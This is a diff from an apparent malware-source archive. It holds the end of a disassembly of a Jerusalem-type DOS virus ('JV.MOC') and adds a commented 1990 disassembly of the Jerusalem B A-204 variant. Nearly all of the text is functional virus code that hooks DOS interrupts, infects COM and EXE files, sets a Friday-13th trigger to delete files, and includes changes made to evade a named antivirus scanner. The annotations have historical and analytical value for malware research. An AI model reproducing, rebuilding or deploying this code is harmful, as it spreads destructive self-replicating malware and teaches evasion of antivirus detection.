0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 
MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 
MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR 
[Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV 
AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? 
DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL 
+0000:06CF 0000 ADD [BX+SI],AL +0000:06D1 0000 ADD [BX+SI],AL +0000:06D3 0000 ADD [BX+SI],AL +0000:06D5 0000 ADD [BX+SI],AL +0000:06D7 0000 ADD [BX+SI],AL +0000:06D9 005718 ADD [BX+018H],DL +0000:06DC 0825 OR [DI],AH +0000:06DE A5 MOVSW +0000:06DF FEC5 INC CH +0000:06E1 07 POP ES +0000:06E2 1E PUSH DS +0000:06E3 0210 ADD DL,[BX+SI] +0000:06E5 07 POP ES +0000:06E6 57 PUSH DI +0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH +0000:06EB 0104 ADD [SI],AX +0000:06ED 7F70 JG X075F + +"JV.MOC" PAGE 0014 + +0000:06EF 0010 ADD [BX+SI],DL +0000:06F1 07 POP ES +0000:06F2 1D001C SBB AX,01C00H +0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP +0000:06F9 0C1B OR AL,01BH +0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH] +0000:06FF F24D REPNE DEC BP +0000:0701 360E PUSH CS +0000:0703 0300 ADD AX,[BX+SI] +0000:0705 0000 ADD [BX+SI],AL +0000:0707 00EE ADD DH,CH +0000:0709 002A X0709: ADD [BP+SI],CH +0000:070B 0F POP CS +0000:070C 42 INC DX +0000:070D 01C1 ADD CX,AX +0000:070F 0DB44C OR AX,04CB4H +0000:0712 B000 MOV AL,00H +0000:0714 CD21 X0714: INT 021H +0000:0716 4D DEC BP +0000:0717 7344 JAE X075D +0000:0719 6F73 JG X078E + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jerub204.asm b/MSDOS/Virus.MSDOS.Unknown.jerub204.asm new file mode 100644 index 00000000..238195e6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jerub204.asm 
@@ -0,0 +1,977 @@
+ Virus : Jerusalem Version B Variant A-204
+Disassembled by : Righard Zwienenberg
+ Steenwijklaan 302
+ 2541 RT The Hague
+ The Netherlands
+ Data : +31-70-3898822, V22,V22b,HST,MNP,CM
+ Voive : +31-70-3675379
+FidoNet address : 2:512/2.3
+ Used Software : ASMGEN, DEBUG and D86-Disassembler
+ Date : 20 june 1990
+
+Note : All Values are hex. If a value is followd by d (e.g. 30d) it means
+30 decimal.
+
+Note : This disassembly consists of two programs. The original program was
+a dummy file (20h bytes long) containing 1Fh times 90 RET and 01h time
+C3 RET.
+
+0100 E9 92 00 JMP 0195 ; JUMP -> 0195h
+
+0103 db 2A,41,2D,32,30,34,2A ; *A-204* never used
+
+010A dw 00 01 ; Startaddress original program
+010C dw 01 56 ; Startaddress-offset original program
+010E db 00 ; Trigger for destruction (delete file)
+ ; Always zero, but if it is Friday the 13th and the year is
+ ; not equal 1987 this byte is set to one
+010F dw 00 00 ; Storing place for original AX (read-only word)
+0111 dw 20 00 ; Length of Original Program (0020h)
+0113 dw A5 FE ; Storing place for original BX of INT 08h vector
+0115 dw 00 F0 ; Storing place for original ES of INT 08h vector
+0117 dw 60 14 ; Storing place for original BX of INT 21h vector
+0119 dw 2B 02 ; Storing place for original ES of INT 21h vector
+011B dw 56 05 ; Storing place for original BX of INT 24h vector
+011D dw DE 0C ; Storing place for original ES of INT 24h vector
+011F dw 40 7E ; Storing place for timer for 30 minutes trigger
+ ; By init. set to 7E90h
+
+ ; The following words are never used by the virus. The are used
+ ; by a routine starting at 0398h which is executed when INT 21h
+ ; is called with AH=DEh. This never happens in the code.
+0121 dw 00 00 ;
+0123 dw 00 00 ;
+0125 dw 00 00 ;
+0127 dw 00 00 ;
+0129 dw 00 00 ;
+012B dw 00 00 ;
+012D dw 00 E8 ;
+012F dw 06 EC ;
+
+0131 dw 91 16 ; Storing place for original ES
+0133 dw 80 00 ; Storing place for BX. Never read again
+
+0135 00 00 00 80 00
+
+0139 dw 91 16 ; Storing place for original ES
+
+013B 5C 00
+
+013D dw 91 16 ; Storing place for original ES
+
+013F 6C 00 ;
+
+0141 dw 91 16 ; Temp. storing place for original ES
+0143 dw 00 20 ; Temp. storing place for AX
+0145 dw 0D 1F ; Temp. storing place for ES+10h
+0147 dw 5F 21 ; Storing place for AX
+0149 dw A1 16 ; Temp. storing place for ES+10h
+014B dw 00 F0 ; Temp. storing place for AX
+014D db 02 ; Temp. storing place for AL
+014E db 00 ; COM/EXE indicator
+ ; 0 = EXE-File
+ ; 1 = COM-File
+0151 dw 30 01 ; Temp. storing place for DX
+0153 dw 23 00 ; Temp. storing place for AX
+
+0155 20 01
+
+0157 dw 4A 00 ; Read Only!!! The code only read this word to substract it
+ ; from AX
+
+0159 D4 06 D4 06
+
+015D dw 98 03 ; Temp. Storing place to store AX
+015F dw 10 07 ; Probably startaddress of virus in mem
+0161 dw 84 19 ; Never used!!! 1984h is stored here by the code
+0163 dw C5 00 ; 00C5h is being read and put back later by the code
+0165 dw 99 03 ; Temp. storing place for AX
+
+0167 1C 00 00 00 90 90 90 90 C3
+
+0170 dw 05 00 ; Storing place for file handle (BX)
+0172 dw 20 00 ; Storing place for file attributes
+ ; bit 0 = read only
+ ; bit 1 = hidden file
+ ; bit 2 = system file
+ ; bit 3 = volume label
+ ; bit 4 = subdirectory
+ ; bit 5 = archive bit
+ ; bit 8 = shareable (Novell Network)
+0174 dw D5 14 ; Storing place for file date (DX)
+0176 dw 99 83 ; Storing place for file time (CX)
+0178 dw 00 02 ; 0200h=512d Used as multiplier/divider
+017A dw 10 00 ; 0001h= 1d Used as multiplier/divider
+017C dw 20 3E ; Temp. storing place for AX
+017E dw 00 00 ; Temp. storing place for DX
+0180 dw B9 42 ; Storing place for DX of ASCIZ-Filename
+0182 dw 1A 9B ; Storing place for DS of ASCIZ-Filename
+
+0184 db 43,4F,4D,4D,41,4E,44,2E,43,4F,4D ; COMMAND.COM
+ ; May not become infected
+
+018F dw 01 00 ; Storing place for variable-result of free-memory-scan
+ ; 0000h : not enough memory available
+ ; 0001h : enough memory available
+
+0191 00 00 00 00
+
+0195 FC CLD ; Clear Direct
+0196 B4 E0 MOV AH,0E0 ; This is the check if the
+0198 CD 21 INT 021 ; virus is already active
+ ; in memory. INT 21h with
+ ; AH=E0h will return AX=0300h
+ ; if the virus is active.
+019A 80 FC E0 CMP AH,0E0 ; AH>=E0h?
+019D 73 16 JAE 01B5 ; Yes: -> 01B5h
+019F 80 FC 03 CMP AH,3 ; AH<-03h?
+01A2 72 11 JB 01B5 ; Yes: -> 01B5h
+ ; INT 21h with AH=
+ ; DDh,DEh,E0h
+ ; are self-defined.
+
+ ; SetUp for
+ ; Executing original program
+ ; We come here if an infected
+ ; program is executed and the
+ ; virus is already active in
+ ; memory.
+01A4 B4 DD MOV AH,0DD ;
+01A6 BF 00 01 MOV DI,0100 ; Destination Index = 0100h
+01A9 BE 10 07 MOV SI,0710 ; Source Index = 0710h
+01AC 03 F7 ADD SI,DI ; Source Index:= 0810h
+ ; At this place the original
+ ; Program is located
+01AE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=20h (length original
+ ; Program)
+01B3 CD 21 INT 021 ;
+
+ ; Here we come when the virus
+ ; is not yet in memory
+01B5 8C C8 MOV AX,CS ; AX=Code Segment
+01B7 05 10 00 ADD AX,010 ; AX:=AX+10h
+01BA 8E D0 MOV SS,AX ; Stack Segment:=AX
+01BC BC 00 07 MOV SP,0700 ; StackPointer = 0700h
+01BF 50 PUSH AX ; Store AX
+01C0 B8 C5 00 MOV AX,0C5 ; AX = C5h
+01C3 50 PUSH AX ; Store AX
+01C4 CB RETF ; -> C5h
+
+01C5 FC CLD ; Clear Direct
+01C6 06 PUSH ES ; Store ES
+01C7 2E 8C 06 31 00 CS MOV W[031],ES ; Store ES
+01CC 2E 8C 06 39 00 CS MOV W[039],ES ; in storage places
+01D1 2E 8C 06 3D 00 CS MOV W[03D],ES ;
+01D6 2E 8C 06 41 00 CS MOV W[041],ES ;
+01DB 8C C0 MOV AX,ES ; AX=ES
+01DD 05 10 00 ADD AX,010 ; AX=AX+10h
+01E0 2E 01 06 49 00 CS ADD W[049],AX ; Add AX (ES+10h) to 0149h
+01E5 2E 01 06 45 00 CS ADD W[045],AX ; and 0145h
+01EA B4 E0 MOV AH,0E0 ; AH=E0h (Self defined)
+01EC CD 21 INT 021 ; CALL INT 21h
+
+01EE 80 FC E0 CMP AH,0E0 ; AH>=0Eh?
+01F1 73 13 JAE 0206 ; Yes: -> 0206
+01F3 80 FC 03 CMP AH,3 ; AH=03h? Must be if the
+ ; viruscode is in memory
+ ; and interrupt 21h is called
+ ; with AH=E0h.
+
+01F6 07 POP ES ; Restore original ES
+01F7 2E 8E 16 45 00 CS MOV SS,W[045] ; SS=ES+10h
+01FC 2E 8B 26 43 00 CS MOV SP,W[043] ;
+0201 2E FF 2E 47 00 CS JMP D[047] ;
+
+0206 33 C0 XOR AX,AX ; AX=0000h
+0208 8E C0 MOV ES,AX ; ES=0000h
+020A 26 A1 FC 03 ES MOV AX,W[03FC]
+
+ ; Here the A-204 variant
+ ; differs for the first
+ ; time from the original
+ ; Jerusalem Version B virus.
+020E 26 A0 FE 03 ES MOV AL,B[03FE] ; These two line have been
+0212 2E A3 4B 00 CS MOV W[04B],AX ; changed in order
+ ; to avoid being
+ ; detected by ViruScan from
+ ; John McAfee.
+
+0216 2E A2 4D 00 CS MOV B[04D],AL
+021A 26 C7 06 FC 03 F3 A5 ES MOV W[03FC],0A5F3
+0221 26 C6 06 FE 03 CB ES MOV B[03FE],0CB
+0227 58 POP AX
+0228 05 10 00 ADD AX,010
+022B 8E C0 MOV ES,AX
+022D 0E PUSH CS ; Store CS
+022E 1F POP DS ; DS=CS
+022F B9 10 07 MOV CX,0710 ; CX=0710h
+0232 D1 E9 SHR CX,1 ; CX >> 1 (CX:=0308h)
+0234 33 F6 XOR SI,SI ; SI=0000h
+0236 8B FE MOV DI,SI ; DI=0000h
+0238 06 PUSH ES ; Store ES
+0239 B8 42 01 MOV AX,0142 ; AX=0142h
+023C 50 PUSH AX ; Store AX
+023D EA FC 03 00 00 JMP 0:03FC
+
+0242 8C C8 MOV AX,CS ; AX=CS
+0244 8E D0 MOV SS,AX ; SS=CS
+0246 BC 00 07 MOV SP,0700 ; SP=0700h
+0249 33 C0 XOR AX,AX ; AX=0000h
+024B 8E D8 MOV DS,AX ; DS=0000h
+024D 2E A1 4B 00 CS MOV AX,W[04B] ; Restore AX
+0251 A3 FC 03 MOV W[03FC],AX ; Store AX
+0254 2E A0 4D 00 CS MOV AL,B[04D] ; Restore AL
+0258 A2 FE 03 MOV B[03FE],AL ; Store AL
+025B 8B DC MOV BX,SP ; BX=SP
+025D B1 04 MOV CL,4 ; CL=04h
+025F D3 EB SHR BX,CL ; BX >> 4
+0261 83 C3 10 ADD BX,010 ; BX=BX+10h
+0264 2E 89 1E 33 00 CS MOV W[033],BX ; Store BX. Why I don't know,
+ ; the storing place is never
+ ; read again
+0269 B4 4A MOV AH,04A ;
+026B 2E 8E 06 31 00 CS MOV ES,W[031] ; Restore ES
+0270 CD 21 INT 021 ; Adjust Memory Block Size
+ ; (SETBLOCK)
+
+0272 B8 21 35 MOV AX,03521 ; Get original INT 21h
+0275 CD 21 INT 021 ; vector
+
+0277 2E 89 1E 17 00 CS MOV W[017],BX ; Store BX and ES of INT 21h
+027C 2E 8C 06 19 00 CS MOV W[019],ES ; vector
+0281 0E PUSH CS ; Store CS
+0282 1F POP DS ; DS=CS
+0283 BA 5B 02 MOV DX,025B ; DX=025Bh
+0286 B8 21 25 MOV AX,02521 ; Set new INT 21h
+0289 CD 21 INT 021 ; vector on DS:025Bh
+
+028B 8E 06 31 00 MOV ES,W[031] ; Restore original ES
+028F 26 8E 06 2C 00 ES MOV ES,W[02C] ;
+0294 33 FF XOR DI,DI ; DI=0000h
+0296 B9 FF 7F MOV CX,07FFF ; CX=7FFFh
+0299 32 C0 XOR AL,AL ; AL=0000h
+029B F2 AE REPNE SCASB ;
+029D 26 38 05 ES CMP B[DI],AL ;
+02A0 E0 F9 LOOPNE 029B ; No Flags: DEC CX -> 02A2h
+ ; IF CX<>0 and not equal
+ ; -> 029B
+02A2 8B D7 MOV DX,DI ; DX=DI
+02A4 83 C2 03 ADD DX,3 ; DX=DX+03h
+02A7 B8 00 4B MOV AX,04B00 ; AX=4B00h
+02AA 06 PUSH ES ; Store ES
+02AB 1F POP DS ; Restore DS (DS:=ES)
+02AC 0E PUSH CS ; Store CS
+02AD 07 POP ES ; Restore ES (ES:=CS)
+02AE BB 35 00 MOV BX,035 ; BX=35h
+02B1 1E PUSH DS ; Store Registers
+02B2 06 PUSH ES
+02B3 50 PUSH AX
+02B4 53 PUSH BX
+02B5 51 PUSH CX
+02B6 52 PUSH DX
+
+02B7 B4 2A MOV AH,02A ; Get Current Date
+02B9 CD 21 INT 021 ; DL=day
+ ; DH=month
+ ; CX=year
+ ; AL=Day of the week
+
+02BB 2E C6 06 0E 00 00 CS MOV B[0E],0 ; Set Trigger for deleting
+ ; infected files to 00h
+02C1 81 F9 C3 07 CMP CX,07C3 ; Is year 1987 ?
+02C5 74 30 JE 02F7 ; Yes: -> 02F7h
+02C7 3C 05 CMP AL,5 ; Is it Friday ?
+02C9 75 0D JNE 02D8 ; No: -> 02D8h
+02CB 80 FA 0D CMP DL,0D ; Is it 13th ?
+02CE 75 08 JNE 02D8 ; No: -> 02D8h
+ ; Yes: it is Friday
+ ; the 13th and the
+ ; year is not equal 1987
+02D0 2E FE 06 0E 00 CS INC B[0E] ; Set Trigger for deleting
+ ; infected files to 01h
+02D5 EB 20 JMP 02F7 ; JUMP -> 02F7h
+
+02D7 90 NOP
+
+02D8 B8 08 35 MOV AX,03508 ; Get original INT 8h
+02DB CD 21 INT 021 ; vector
+
+02DD 2E 89 1E 13 00 CS MOV W[013],BX ; Store original BX
+02E2 2E 8C 06 15 00 CS MOV W[015],ES ; and ES of INT 08h vector
+02E7 0E PUSH CS
+02E8 1F POP DS
+02E9 C7 06 1F 00 90 7E MOV W[01F],07E90 ; Store 30d minutes into
+ ; timer interrupt. This
+ ; value is decreased by
+ ; one 18.2 times per second
+02EF B8 08 25 MOV AX,02508 ; Set new INT 8h vector
+02F2 BA 1E 02 MOV DX,021E ; to DS:021Eh
+02F5 CD 21 INT 021 ;
+
+02F7 5A POP DX ; Restore Registers
+02F8 59 POP CX
+02F9 5B POP BX
+02FA 58 POP AX
+02FB 07 POP ES
+02FC 1F POP DS
+02FD 9C PUSHF ; Store Flags
+02FE 2E FF 1E 17 00 CS CALL D[017] ; Call original INT 21h
+ ; address
+
+0303 1E PUSH DS ; Restore DS
+0304 07 POP ES ; Store ES
+0305 B4 49 MOV AH,049 ; Free Memory
+0307 CD 21 INT 021 ;
+
+0309 B4 4D MOV AH,04D ; Get ExitCode of
+030B CD 21 INT 021 ; SubProgram (WAIT)
+ ; Stored in AL
+
+030D B4 31 MOV AH,031 ; AX=31[AL]h
+030F BA 00 06 MOV DX,0600 ; DX=600h
